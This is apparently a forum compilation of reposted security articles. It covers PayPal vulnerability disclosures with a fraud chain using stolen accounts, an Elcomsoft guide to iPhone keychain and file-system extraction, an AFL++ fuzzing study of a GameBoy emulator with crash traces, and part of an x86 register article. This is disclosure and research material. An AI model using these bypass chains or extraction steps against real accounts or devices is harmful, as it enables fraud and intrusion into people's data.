Scammers can find lots of uses for this vulnerability, but the major implication is unmissable. By bypassing this phone verification, it will make it much easier for scammers to create fraudulent accounts, especially since there’s no need to receive an SMS verification code. PayPal’s response Initially, the PayPal team via HackerOne took this issue more seriously. However, after a few exchanges, they stopped responding to our queries, and recently PayPal itself (not the HackerOne staff) locked this report, meaning that we aren’t able to comment any longer. #3 Sending money security bypass PayPal has set up certain security measures in order to help avoid fraud and other malicious actions on the tool. One of these is a security measure that’s triggered when one of the following conditions, or a combination of these, is met: You’re using a new device You’re trying to send payments from a different location or IP address There’s a change in your usual sending pattern The owning account is not “aged” well (meaning that it’s pretty new) When these conditions are met, PayPal may throw up a few types of errors to the users, including: “You’ll need to link a new payment method to send the money” “Your payment was denied, please try again later” How we did it Our analysts found that PayPal’s sending money security block is vulnerable to brute force attacks. What’s the worst case scenario here? This is similar in impact to Vulnerability #1 mentioned above. An attacker with access to stolen PayPal credentials can access these accounts after easily bypassing PayPal’s security measure. PayPal’s response When we submitted this to HackerOne, they responded that this is an “out-of-scope” issue since it requires stolen PayPal accounts. As such, they closed the issue as Not Applicable, costing us 5 reputation points in the process. #4 Full name change By default, PayPal allows users to only change 1-2 letters of their name once (usually because of typos). After that, the option to update your name disappears. However, using the current version of PayPal.com, the CyberNews research team was able to change a test account’s name from “Tester IAmTester” to “christin christina”. How we did it We discovered that if we capture the requests and repeat it every time by changing 1-2 letters at a time, we are able to fully change account names to something completely different, without any verification. We also discovered that we can use any unicode symbols, including emojis, in the name field. What’s the worst case scenario here? An attacker, armed with stolen PayPal credentials, can change the account holder’s name. Once they’ve completely taken over an account, the real account holder wouldn’t be able to claim that account, since the name has been changed and their official documents would be of no assistance. PayPal’s response This issue was deemed a Duplicate by PayPal, since it had been apparently discovered by another researcher. #5 The self-help SmartChat stored XSS vulnerability PayPal’s self-help chat, which it calls SmartChat, lets users find answers to the most common questions. Our research discovered that this SmartChat integration is missing crucial form validation that checks the text that a person writes. How we did it Because the validation is done at the front end, we were able to use a man in the middle (MITM) proxy to capture the traffic that was going to Paypal servers and attach our malicious payload. What’s the worst case scenario here? Anyone can write malicious code into the chatbox and PayPal’s system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account. With that, the scammer can log into their account, pretend to be a customer support agent, and get sensitive information from PayPal users. PayPal’s response The same day that we informed PayPal of this issue, they replied that since it isn’t “exploitable externally,” it is a non-issue. However, while we planned to send them a full POC (proof of concept), PayPal seems to have removed the file on which the exploit was based. This indicates that they were not honest with us and patched the problem quietly themselves, providing us with no credit, thanks, or bounty. Instead, they closed this as Not Applicable, costing us another 5 points in the process. #6 Security questions persistent XSS This vulnerability is similar to the one above (#5), since PayPal does not sanitize its Security Questions input. How we did it Because PayPal’s Security Questions input box is not validated properly, we were able to use the MITM method described above. Here is a screenshot that shows our test code being injected to the account after refresh, resulting in a massive clickable link: What’s the worst case scenario here? Attackers can inject scripts to other people’s accounts to grab sensitive data. By using Vulnerability #1 and logging in to a user’s account, a scammer can inject code that can later run on any computer once a victim logs into their account. This includes: Showing a fake pop up that could say “Download the new PayPal app” which could actually be malware. Changing the text user is adding. For example, the scammer can alter the email where the money is being sent. Keylogging credit card information when the user inputs it. There are many more ways to use this vulnerability and, like all of these exploits, it’s only limited by the scammer’s imagination. PayPal’s response The same day we reported this issue, PayPal responded that it had already been reported. Also on the same day, the vulnerability seems to have been patched on PayPal’s side. They deemed this issue a Duplicate, and we lost another 5 points. PayPal’s reputation for dishonesty PayPal has been on the receiving end of criticism for not honoring its own bug bounty program. Most ethical hackers will remember the 2013 case of Robert Kugler, the 17-year old German student who was shafted out of a huge bounty after he discovered a critical bug on PayPal’s site. Kugler notified PayPal of the vulnerability on May 19, but apparently PayPal told him that because he was under 18, he was ineligible for the Bug Bounty Program. But according to PayPal, the bug had already been discovered by someone else, but they also admitted that the young hacker was just too young. Another researcher earlier discovered that attempting to communicate serious vulnerabilities in PayPal’s software led to long delays. At the end, and frustrated, the researcher promises to never waste his time with PayPal again. There’s also the case of another teenager, Joshua Rogers, also 17 at the time, who said that he was able to easily bypass PayPal’s 2FA. He went on to state, however, that PayPal didn’t respond after multiple attempts at communicating the issue with them. PayPal acknowledged and downplayed the vulnerability, later patching it, without offering any thanks to Rogers. The big problem with HackerOne HackerOne is often hailed as a godsend for ethical hackers, allowing companies to get novel ways to patch up their tools, and allowing hackers to get paid for finding those vulnerabilities. It’s certainly the most popular, especially since big names like PayPal work exclusively with the platform. There have been issues with HackerOne’s response, including the huge scandal involving Valve, when a researcher was banned from HackerOne after trying to report a Steam zero-day. However, its Triage system, which is often seen as an innovation, actually has a serious problem. The way that HackerOne’s triage system works is simple: instead of bothering the vendor (HackerOne’s customer) with each reported vulnerability, they’ve set up a system where HackerOne Security Analysts will quickly check and categorize each reported issue and escalate or close the issues as needed. This is similar to the triage system in hospitals. These Security Analysts are able to identify the problem, try to replicate it, and communicate with the vendor to work on a fix. However, there’s one big flaw here: these Security Analysts are also active Bug Bounty Hackers. Essentially, these Security Analysts get first dibs on reported vulnerabilities. They have full discretion on the type of severity of the issue, and they have the power to escalate, delay or close the issue. That presents a huge opportunity for them, if they act in bad faith. Other criticisms have pointed out that Security Analysts can first delay the reported vulnerability, report it themselves on a different bug bounty platform, collect the bounty (without disclosing it of course), and then closing the reported issue as Not Applicable, or perhaps Duplicate. As such, the system is ripe for abuse, especially since Security Analysts on HackerOne use generic usernames, meaning that there’s no real way of knowing what they are doing on other bug bounty platforms. What it all means All in all, the exact “Who is to blame” question is left unanswered at this point, because it is overshadowed by another bigger question: why are these services so irresponsible? Let’s point out a simple combination of vulnerabilities that any malicious actor can use: Buy PayPal accounts on the black market for pennies on the dollar. (On this .onion website, you can buy a $5,000 PayPal account for just $150, giving you a 3,333% ROI.) Use Vulnerability #1 to bypass the two-factor authentication easily. Use Vulnerability #3 to bypass the sending money security and easily send money from the linked bank accounts and cards. Alternatively, the scammer can use Vulnerability #1 to bypass 2FA and then use Vulnerability #4 to change the account holder’s name. That way, the scammer can lock the original owner out of their own account. While these are just two simple ways to use our discovered vulnerabilities, scammers – who have much more motivation and creativity for maliciousness (as well as a penchant for scalable attacks) – will most likely have many more ways to use these exploits. And yet, to PayPal and HackerOne, these are non-issues. Even worse, it seems that you’ll just get punished for reporting it. Share19TweetShare Bernard Meyer Bernard Meyer is a security researcher at CyberNews. He has a strong passion for security in popular software, maximizing privacy online, and keeping an eye on governments and corporations. You can usually find him on Twitter arguing with someone about something moderately important. Sursa: https://cybernews.com/security/we-found-6-critical-paypal-vulnerabilities-and-paypal-punished-us/

iPhone Acquisition Without a Jailbreak (iOS 11 and 12) February 20th, 2020 by Oleg Afonin Category: «Elcomsoft News» 22 10 32 Shares Elcomsoft iOS Forensic Toolkit can perform full file system acquisition and decrypt the keychain from non-jailbroken iPhone and iPad devices. The caveat: the device must be running iOS 11 or 12 (except iOS 12.3, 12.3.1 and 12.4.1), and you must use an Apple ID registered in Apple’s Developer Program. In this article, I’ll explain the pros and contras of the new extraction method compared to traditional acquisition based on the jailbreak. Why jailbreak? Before I start talking about the new extraction method that does not require a jailbreak, let me cover the jailbreak first. In many cases, jailbreaking the device is the only way to obtain the file system and decrypt the keychain from iOS devices. Jailbreaking the device provides the required low-level access to the files and security keys inside the device, which is what we need to perform the extraction. Jailbreaks have their negative points; lots of them in fact. Jailbreaking may be dangerous if not done properly. Jailbreaking the device can modify the file system (especially if you don’t pay close attention during the installation). A jailbreak installs lots of unnecessary stuff, which will be difficult to remove once you are done with extraction. Finally, jailbreaks are obtained from third-party sources; obtaining a jailbreak from the wrong source may expose the device to malware. For these and other reasons, jailbreaking may not be an option for some experts. This is exactly what the new acquisition method is designed to overcome. Agent-based extraction The new extraction method is based on direct access to the file system, and does not require jailbreaking the device. Using agent-based extraction, you can can perform the full file system extraction and decrypt the keychain without the risks and footprint associated with third-party jailbreaks. Agent-based extraction is new. In previous versions, iOS Forensic Toolkit offered the choice of advanced logical extraction (all devices) and full file system extraction with keychain decryption (jailbroken devices only). The second acquisition method required installing a jailbreak. EIFT 5.30 introduced the third extraction method based on direct access to the file system. The new acquisition method utilizes an extraction agent we developed in-house. Once installed, the agent will talk to your computer, delivering significantly better speed and reliability compared to jailbreak-based extraction. In addition, agent-based extraction is completely safe as it neither modifies the system partition nor remounts the file system while performing automatic on-the-fly hashing of information being extracted. Agent-based extraction does not make any changes to user data, offering forensically sound extraction. Both the file system image and all keychain records are extracted and decrypted. Once you are done, you can remove the agent with a single command. Compatibility of agent-based extraction Jailbreak-free extraction is only available for a limited range of iOS devices. Supported devices range from the iPhone 5s all the way up to the iPhone Xr, Xs and Xs Max if they run any version of iOS from iOS 11 through iOS 12.4 (except iOS 12.3 and 12.3.1). Apple iPad devices running on the corresponding SoC are also supported. Here’s where agent-based extraction stands compared to other acquisition methods: The differences between the four acquisition methods are as follows. Logical acquisition: works on all devices and versions of iOS and. Extracts backups, a few logs, can decrypt keychain items (not all of them). Extracts media files and app shared data. Extraction with a jailbreak: full file system extraction and keychain decryption. Only possible if a jailbreak is available for a given combination of iOS version and hardware. Extraction with checkra1n/checkm8: full file system extraction and keychain decryption. Utilizes a hardware exploit. Works on iOS 12.3-13.3.1. Compatibility is limited to A7..A11 devices (up to and including the iPhone X). Limited BFU extraction available if passcode unknown. Agent-based extraction: full file system extraction and keychain decryption. Does not require jailbreaking. Only possible for a limited range of iOS versions (iOS 11-12 except 12.3.1, 12.3.2, 12.4.1). Prerequisites Before you begin, you must have an Apple ID enrolled in Apple’s Developer Program in order to install the agent onto the iOS device being acquired. The Apple ID connected to that account must have two-factor authentication enabled. In addition, you will need to set up an Application-specific password in your Apple account, and use that app-specific password instead of the regular Apple ID password during the Agent installation. Important: you can use your Developer Account for up to 100 devices of every type (e.g. 100 iPhones and 100 iPads). You can remove previously enrolled devices to make room for additional devices. Using agent-based extraction Once you have your Apple ID enrolled in Apple’s Developer Program, and have an app-specific password created, you can start with the agent. Connect the iOS device being acquired to your computer. Approve pairing request (you may have to enter the passcode on the device to do that). Launch Elcomsoft iOS Forensic Toolkit 5.30 or newer. The main menu will appear. We strongly recommend performing logical acquisition first (by creating the backup, extracting media files etc.) For agent-based extraction, you’ll be using numeric commands. Install the agent by using the ‘1’ (Install agent) command. You will have to enter your credentials (Apple ID and the app-specific password you’ve generated). Then type the ‘Team ID’ related to your developer account. Note that a non-developer Apple ID account is not sufficient to install the Agent. After the installation, start the Agent on the device and go back to the desktop to continue. Acquisition steps are similar to jailbreak-based acquisition, except that there is no need to use the ‘D’ (Disable lock) command. Leave the Agent (the iOS app) working in the foreground. Obtain the keychain by entering the ‘2’ command. A copy of the keychain will be saved. Extract the file system with the ‘3’ command. A file system image in the TAR format will be created. After you have finished the extraction, use the ‘4’ command to remove the agent from the device. To analyse the file system image, use Elcomsoft Phone Viewer or an alternative forensic tool that supports .tar images. For analysing the keychain, use Elcomsoft Phone Breaker. For manual analysis, mount or unpack the image (we recommend using a UNIX or macOS system). Conclusion If you have unprocessed Apple devices with iOS 11 – 12.2 or 12.4, and if you cannot jailbreak for one or another reason, give the new extraction mode a try. iOS Forensic Toolkit 5.30 can pull the file system and decrypt the keychain, leaves no apparent traces, does not remount and does not modify the file system while offering safe, fast and reliable extraction. Sursa: https://blog.elcomsoft.com/2020/02/iphone-acquisition-without-a-jailbreak-ios-11-and-12/

Fuzzing A GameBoy Emulator With AFL++ fuzzing reversing exploiting Recently I’ve started a little fuzzing project. After doing some research, I’ve decided to fuzz a gaming emulator. The target of choice is a GameBoy and GameBoy Advance emulator called VisualBoyAdvance-M, which is also called VBA-M. At the time of writing the emulator was still being maintained. VBA-M seems to be a fork of VisualBoyAdvance, for which development seems to have stopped in 2006. Disclaimer: I’m publishing this blog post to share some fuzzing methodology and tooling and not to blame the developers. I’ve previously reported all my fuzzing discoveries to the developer team of VBA-M on GitHub. The attack surface of emulators is quite large because of their complex functionality and various ways to pass user input to the application. There’s parsing functionality for the game ROMs and the save states, built-in cheating support and then there’s all that video and audio I/O related stuff. I’ve decided to fuzz the GameBoy ROM files. The general approach is as follows: Let the emulator load a ROM Let it parse the file and do initialization Run the game for a few frames. This catches bugs that only occur after some time, like corrupting internal memory of the emulator while playing a game. Building A Fuzzing Harness Of course the emulator spins up a GUI every time it’s launched. Since this is quite slow and is not required for the fuzzer at all, this has to be skipped. The same applies for any other functionality that’s not required for the fuzzing harness to work. There are two front ends that use the emulation library provided by VBA-M: One is based on SDL and one on WxWidgets. My fuzzing harness is a modified version of the SDL front end, since it’s more minimal compared to the other one. The SDL sub directory can be found here and contains all files related for this front end. Here’s an overview of the changes I’ve applied to transform the SDL front end to a fuzzing harness: I’ve added a counter that’s being decremented after the emulator has performed one full cycle in gbEmulate(). The emulator shuts down with exit(0) as soon as this value hits the zero value. This is required for the fuzzer since I want it to stop in case no memory corruption happens within a certain amount of frames. Initialization routines for key maps, user preferences and GameBoy Advance ROMs were removed. The routines for sound and video were kept intact because bugs may be present in those too. This makes the fuzzer slower but increases coverage. However, the actual output was patched out. This means that for example the internal video states are still being calculated up to a certain point but nothing is actually being shown on the GUI. For example, functions that perform screen output were simply replaced with return statements. And that’s basically it. LLVM Mode And Persistent Mode One additional change was made to the main() function of the emulator. I’ve added the __AFL_LOOP(10000) directive. This tells AFL to perform in-process fuzzing for a given amount of times before spinning up a new target process. This means that one VBA-M invocation happens for every 10000 inputs, which ultimately speeds up fuzzing. Of course, you have to make sure to not introduce any side effects when using this feature. This mode is also called AFL persistent mode and you can read more about it here. Compiling the fuzzing harness in LLVM Mode and with AFL++ provides much better performance than using something like plain GCC and provides more features, including the persistent mode mentioned above. After compiling AFL++ with LLVM9 or newer, the magic afl-clang-fast++ and afl-clang-fast compilers are available. If your distribution doesn’t provide these packages yet, AFL++ has you covered once again with a Dockerfile. I’ve then used these compilers to build VBA-M with full ASAN enabled: $ cmake .. -DCMAKE_CXX_COMPILER=afl-clang-fast++ -DCMAKE_CC_COMPILER=afl-clang-fast $ AFL_USE_ASAN=1 make -j32 Now it’s time to create some input files for the fuzzer. Building Input Files I’ve created multiple minimal GameBoy ROMs using GBStudio and minimized them afterwards. This worked by deleting some parts using a hex editor and checking if the ROM still works afterwards. Minimizing input files can make the fuzzing process more efficient. System Configuration I’ve used a 32 core machine from Hetzner Cloud as fuzzing server. Before starting to fuzz, you have to make sure that the system is configured properly or you won’t have the best performance possible. The afl-system-config script does this automatically for you. Just be sure to reset the affected values after fuzzing has finished, since this also disables ASLR. Or just throw the fuzzing server away. By putting the AFL working directory on a RAM disk, you can potentially gain some additional speed and avoid wearing out the disks at the same time. I’ve created my RAM disk as follows: $ mkdir /mnt/ramdisk $ mount -t tmpfs -o size=100G tmpfs /mnt/ramdisk Running The Fuzzer I want to start one AFL instance per core. To make this as convenient as possible, I’ve used an AFL start script from here and modified it to make it fit my needs: #!/usr/bin/env python3 # Original from: https://gamozolabs.github.io/fuzzing/2018/09/16/scaling_afl.html import subprocess, threading, time, shutil, os import random, string import multiprocessing NUM_CPUS = multiprocessing.cpu_count() RAMDISK = "/mnt/ramdisk" INPUT_DIR = RAMDISK + "/afl_in" OUTPUT_DIR = RAMDISK + "/afl_out" BACKUP_DIR = "/opt/afl_backup" BIN_PATH = "/opt/vbam/visualboyadvance-m/build/vbam" SCHEDULES = ["coe", "fast", "explore"] print("Using %s CPU Cores" % (NUM_CPUS)) def do_work(cpu): if cpu == 0: fuzzer_arg = "-M" schedule = "exploit" else: fuzzer_arg = "-S" schedule = random.choice(SCHEDULES) os.mkdir("%s/tmp%d" % (OUTPUT_DIR, cpu)) # Restart if it dies, which happens on startup a bit while True: try: args = [ "taskset", "-c", "%d" % cpu, "afl-fuzz", "-f", "%s/tmp%d/a.gb.gz" % (OUTPUT_DIR, cpu), "-p", schedule, "-m", "none", "-i", INPUT_DIR, "-o", OUTPUT_DIR, fuzzer_arg, "fuzzer%d" % cpu, "--", BIN_PATH, "%s/tmp%d/a.gb.gz" % (OUTPUT_DIR, cpu) ] sp = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) sp.wait() except Exception as e: print(str(e)) pass print("CPU %d afl-fuzz instance died" % cpu) # Some backoff if we fail to run time.sleep(1.0) assert os.path.exists(INPUT_DIR), "Invalid input directory" if not os.path.exists(BACKUP_DIR): os.mkdir(BACKUP_DIR) if os.path.exists(OUTPUT_DIR): print("Backing up old output directory") shutil.move( OUTPUT_DIR, BACKUP_DIR + os.sep + ''.join(random.choice(string.ascii_uppercase) for _ in range(16))) print("Creating output directory") os.mkdir(OUTPUT_DIR) # Disable AFL affinity as we do it better os.environ["AFL_NO_AFFINITY"] = "1" for cpu in range(0, NUM_CPUS): threading.Timer(0.0, do_work, args=[cpu]).start() # Let fuzzer stabilize first if cpu == 0: time.sleep(5.0) while threading.active_count() > 1: time.sleep(5.0) try: subprocess.check_call(["afl-whatsup", "-s", OUTPUT_DIR]) except: pass This spawns one master AFL instance and several slaves with each one assigned to an own CPU core. Also, every slave gets its own randomized power schedule. The only thing that’s left is to start this script on the server in a tmux session to detach it from the current SSH session. Here’s what the results look like after running it for a while: Summary stats ============= Fuzzers alive : 32 Total run time : 33 days, 4 hours Total execs : 59 million Cumulative speed : 1200 execs/sec Pending paths : 392 faves, 159374 total Pending per fuzzer : 12 faves, 4980 total (on average) Crashes found : 3662 locally unique The total fuzzing speed could be higher but I went for maximum coverage, so I could catch more potential bugs. Time consuming operations like audio and video I/O certainly slow things down. Fuzzing Results Some of my results can only be reproduced using an ASAN build of VBA-M since heap memory corruption doesn’t necessarily crash the target. Fuzzing was performed on commit 951e8e0ebeeab4fc130e05bfb2c143a394a97657. I’ve found 11 unique crashes in total. Here are the interesting ones: Overflow of Global Variable in mapperTAMA5RAM() ==22758==ERROR: AddressSanitizer: global-buffer-overflow on address 0x55780a09da1c at pc 0x557809b0a468 bp 0x7ffd30d551e0 sp 0x7ffd30d551d8 WRITE of size 4 at 0x55780a09da1c thread T0 #0 0x557809b0a467 in mapperTAMA5RAM(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1247:73 #1 0x557809abd7be in gbWriteMemory(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:991:13 #2 0x557809aeaac0 in gbEmulate(int) /path/to/vbam/visualboyadvance-m/src/gb/gbCodes.h #3 0x557809695d4d in main /path/to/vbam/visualboyadvance-m/src/sdl/SDL.cpp:1858:17 #4 0x7f2498e41152 in __libc_start_main (/usr/lib/libc.so.6+0x27152) #5 0x5578095ad6ad in _start (/path/to/vbam/ge/build/vbam+0xb66ad) Address 0x55780a09da1c is a wild pointer. SUMMARY: AddressSanitizer: global-buffer-overflow /path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1247:73 in mapperTAMA5RAM(unsigned short, unsigned char) This is a case where the indexing of a global variable goes wrong. Check out this code snippet that seems to cover special cases for Tamagotchi on the GameBoy platform: void mapperTAMA5RAM(uint16_t address, uint8_t value) { if ((address & 0xffff) <= 0xa001) { switch (address & 1) { case 0: // 'Values' Register { value &= 0xf; gbDataTAMA5.mapperCommands[gbDataTAMA5.mapperCommandNumber] = value; [...] } [...] } [...] } [...] } The fuzzer found various inputs file that cause the value of gbDataTAMA5.mapperCommandNumber to become larger than the gbDataTAMA5.mapperCommands array, which is static and always holds 16 entries. This results in a write operation of 4 bytes that goes beyond the gbDataTAMA5 structure. In fact, it was possible to write to other structures nearby. There’s a limitation that restricts the overflow from going beyond the offset 0xFF since VBA-M reads only a single byte into the index. This happens even though the data type of the index itself is an integer. Since I had over 850 unique cases that trigger this bug, I’ve checked how much each one overflows the array using a GDB batch script called dump.gdb: break *mapperTAMA5RAM+153 r i r rax The value of RAX at the breakpoint is the offset of the write operation. I’ve launched GDB like this: for f in *; do cp "$f" /tmp/yolo.gb.gz && gdb --batch --command=dump.gdb --args /path/to/vbam/visualboyadvance-m/build/vbam /tmp/yolo.gb.gz | tail -1; done This executes the emulator until the buggy write operation happens, prints the offset and exits. During a debugging session it can also be observed which data structure is getting manipulated by the write operation: p &gbDataTAMA5.mapperCommands[gbDataTAMA5.mapperCommandNumber] $2 = (int *) 0x5555557ed6dc <gbSgbSaveStructV3+124> <-- of out bounds This clearly isn’t pointing to anything inside gbDataTAMA5 and therefore demonstrates that memory can be corrupted using this bug. However, I haven’t found a way to gain code execution using this Writing to a function pointer using a partial overwrite or something similar would be a way to exploit this. The only things that I was able to manipulate were sound settings and a structure that defines how many days there are in a given month Too bad. Overflow of Global Variable in mapperHuC3RAM() ==21687==ERROR: AddressSanitizer: global-buffer-overflow on address 0x561152cdf760 at pc 0x56115274a793 bp 0x7ffedd4cab10 sp 0x7ffedd4cab08 WRITE of size 4 at 0x561152cdf760 thread T0 #0 0x56115274a792 in mapperHuC3RAM(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1090:57 #1 0x5611526ff7be in gbWriteMemory(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:991:13 #2 0x56115272a547 in gbEmulate(int) /path/to/vbam/visualboyadvance-m/src/gb/gbCodes.h:1246:1 #3 0x5611522d7d4d in main /path/to/vbam/visualboyadvance-m/src/sdl/SDL.cpp:1858:17 #4 0x7f39eb078152 in __libc_start_main (/usr/lib/libc.so.6+0x27152) #5 0x5611521ef6ad in _start (/path/to/vbam/triage/build/vbam+0xb66ad) 0x561152cdf760 is located 32 bytes to the left of global variable 'gbDataTAMA5' defined in '/path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1138:13' (0x561152cdf780) of size 168 0x561152cdf760 is located 4 bytes to the right of global variable 'gbDataHuC3' defined in '/path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:991:12' (0x561152cdf720) of size 60 SUMMARY: AddressSanitizer: global-buffer-overflow /path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1090:57 in mapperHuC3RAM(unsigned short, unsigned char) The function mapperHuC3RAM() gets called by gbWriteMemory(). The corruption happens after these lines: p = &gbDataHuC3.mapperRegister2; *(p + gbDataHuC3.mapperRegister1++) = value & 0x0f; The value of p points to invalid memory next to the gbDataHuC3 variable in the fuzzing case. Therefore the write operation happens outside of it and can potentially be used to overwrite other content on the stack. However, it wasn’t possible to properly control the write operation and therefore no critical locations could be overwritten. User-After-Free in gbCopyMemory() ==13939==ERROR: AddressSanitizer: heap-use-after-free on address 0x615000003680 at pc 0x55b3dc38388b bp 0x7ffcecd0e1e0 sp 0x7ffcecd0e1d8 READ of size 1 at 0x615000003680 thread T0 #0 0x55b3dc38388a in gbCopyMemory(unsigned short, unsigned short, int) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:882:44 #1 0x55b3dc38388a in gbWriteMemory(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:1428:9 #2 0x55b3dc3a931c in gbEmulate(int) /path/to/vbam/visualboyadvance-m/src/gb/gbCodes.h #3 0x55b3dbf55d4d in main /path/to/vbam/visualboyadvance-m/src/sdl/SDL.cpp:1858:17 #4 0x7f5f9d50e152 in __libc_start_main (/usr/lib/libc.so.6+0x27152) #5 0x55b3dbe6d6ad in _start (/path/to/vbam/triage/build/vbam+0xb66ad) 0x615000003680 is located 384 bytes inside of 488-byte region [0x615000003500,0x6150000036e8) freed by thread T0 here: #0 0x55b3dbf0e8a9 in free (/path/to/vbam/triage/build/vbam+0x1578a9) #1 0x7f5f9d55bd03 in fclose@@GLIBC_2.2.5 (/usr/lib/libc.so.6+0x74d03) previously allocated by thread T0 here: #0 0x55b3dbf0ebd9 in malloc (/path/to/vbam/triage/build/vbam+0x157bd9) #1 0x7f5f9d55c5ee in __fopen_internal (/usr/lib/libc.so.6+0x755ee) #2 0x672f303030312f71 (<unknown module>) This bugs seems to be triggered upon doing HDMA (Horizontal Blanking Direct Memory Access) using this helper function: void gbCopyMemory(uint16_t d, uint16_t s, int count) { while (count) { gbMemoryMap[d >> 12][d & 0x0fff] = gbMemoryMap[s >> 12][s & 0x0fff]; s++; d++; count--; } } The fuzzer found a case where the source of the DMA write operation points to memory which has been freed previously. In case the allocation of this address can be controlled, the write operation could therefore also be controlled partially. Maybe. Maybe not Null Dereference in gbReadMemory() ==16217==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5629cb1be6ae bp 0x000000000000 sp 0x7ffe9ccb8c40 T0) ==16217==The signal is caused by a READ memory access. ==16217==Hint: address points to the zero page. #0 0x5629cb1be6ad in gbReadMemory(unsigned short) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:1801:20 #1 0x5629cb1d59dd in gbEmulate(int) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:4637:42 #2 0x5629cad8fd4d in main /path/to/vbam/visualboyadvance-m/src/sdl/SDL.cpp:1858:17 #3 0x7fa13d83d152 in __libc_start_main (/usr/lib/libc.so.6+0x27152) #4 0x5629caca76ad in _start (/path/to/vbam/ge/build/vbam+0xb66ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:1801:20 in gbReadMemory(unsigned short) ==16217==ABORTING The bug happens in these lines: if (mapperReadRAM) return mapperReadRAM(address); return gbMemoryMap[address >> 12][address & 0x0fff]; <-- null deref happens here The gbMemoryMap entry at index 10 is being accessed, which is NULL. This is only a DoS though and I’ve also found two more NULL dereference bugs like this in other locations. DoS Caused By Invalid Calculated Size AFL also found another case where it was possible to cause a DoS on the emulator. This is caused by an invalid and very large size parameter that’s being passed to a malloc() call. Here’s why that happens: The size of the ROM is being read from the ROM header, which can be controlled by an attacker This value is the size parameter for a malloc() call. If the attacker places a negative value in the respective header field, the emulator will just use this value without any prior checks and pass it to malloc(). Since malloc() only accepts signed values of type size_t, the negative value will be converted to an unsigned value and will therefore by very huge. malloc() tries to allocate several gigabytes of memory, which causes the process to hang. The fix would be to use an unsigned value for the size value. Also, an additional sanitation should be added after reading the value, since GameBoy games rarely use more than a few gigabytes of memory Static Analysis: Overflow of Global filename Variable Before fuzzing I’ve also performed some static analysis of the SDL front end. I’ve found that by simply calling vbam with a very long GameBoy ROM file path, a global variable called filename can be corrupted. It’s defined in SDL.cpp as char filename[2048]. On startup, the following code is being executed: utilStripDoubleExtension(szFile, filename); The szFile variable contains the input string which was passed to the emulator and filename is the global variable mentioned before. This is the implementation of utilStripDoubleExtension(): // strip .gz or .z off end void utilStripDoubleExtension(const char *file, char *buffer) { if (buffer != file) // allows conversion in place strcpy(buffer, file); [...] } This is a quite standard buffer overflow vulnerability that overwrites the global variable filename. Overwriting it doesn’t trigger any canary checks since it’s not a local variable. Because of the overflow it’s possible to overwrite the global variables that were defined before filename. A way to exploit this would be to overwrite a function pointer or something similar. In fact, there are function pointers available to be overwritten just before filename: struct EmulatedSystem emulator = { NULL, NULL, NULL, NULL, NULL, NULL, <- These are all function pointers NULL, NULL, NULL, NULL, NULL, NULL, false, 0 }; [...] uint32_t systemColorMap32[0x10000]; uint16_t systemColorMap16[0x10000]; uint16_t systemGbPalette[24]; char filename[2048]; [...] Notice the size of systemColorMap32 and systemColorMap16: These are huge arrays which prevent filename from overflowing into the emulator struct since there’s a limit which restricts the size of the arguments passed to applications via the command line. Exploiting this would have been a funny CTF challenge but oh well OK BYE! Sursa: https://bananamafia.dev/post/gb-fuzz/

Does register selection matter to performance on x86 CPUs? fiigii.com 2020-02-16 Compiler, Intel, x86 Instruction selection is a critical portion in compilers, as different instructions could cause significant performance differences even though the semantics not changed. Does register selection also matter to performance (assume the register selection does not lead to less or more register spills)? Honestly, I never intentionally thought of this question until I came across it on Zhihu (a Chinese Q&A website). But this is a really interesting topic that reflects many tricks of assembly programming and compiler code generation. So, that deserves a blog to refresh my memory and give a share In other words, the question is equivalent to Is one of the instructions below faster than another one? And the question can be extended to any instruction of x86/x86-64 ISAs (not only on ADD). From undergraduate classes in CS departments, we know modern computer architectures usually have a pipeline stage called register renaming that assigns real physical registers to the named logic register referred to in an assembly instruction. For example, the following code uses EAX twice but the two usages are not related to each other. 1 2 ADD EDX, EAX ADD EAX, EBX Assume this code is semantically correct. In practice, CPUs usually assign different physical registers to the two EAX for breaking anti-dependency. So they can parallel execute on pipelined superscalar CPUs, and ADD EAX, EBX does not have to worry about if writing over EAX impacts ADD EDX, EAX. Therefore, we usually suppose different register names in assembly code do NOT cause performance difference on modern x86 CPUs. Is the story over? No. The above statements only hold for general cases. There are a lot of corner cases existing in the real world that our college courses never reached. CPUs are pearls of modern engineering and industry, which also have many corner cases breaking our common sense. So, different register names will impact performance a lot, sometimes. I collected these corner cases in four categories. Note, the rest of the article only talks about Intel micro-architectures. Special Instructions A few instructions are executing slower with certain logic registers due to micro-architecture limitations. The most famous one is LEA. LEA was designed to leverage the complex and powerful x86 addressing-mode in wider areas, such as arithmetic computations. LEA could be executed on AGU (Address Generation Unit) and save registers from intermediate results. However, certain forms of LEA only can be executed on port1, which those LEA forms with lower ILP and higher latency are called slow LEA. According to the Intel optimization manual, using EBP, RBP, or R13 as the base address will make LEA slower. Although compilers could assign other registers to the base address variables, sometimes that is impossible in register allocations and there are more forms of slow LEAs that cannot be improved by register selection. Hence, in general, compilers avoid generating slow LEAs by (1) replacing LEA by equivalent instruction sequences that may need more temporary registers or (2) folding LEA into its user instructions’ addressing modes. Partial Register Stall Most kinds of x86 registers (e.g., general-purpose registers, FLAGS, and SIMD registers, etc.) can be accessed by multiple granularities. For instance, RAX can be partially accessed via EAX, AX, AH, and AL. Accessing AL is independent of AH on Intel CPUs, but reading EAX content that written though AL has significant performance degradation (5-6 cycles of latency). Consequently, Intel suggests always using registers with sizes of 32- or 64-bit. 1 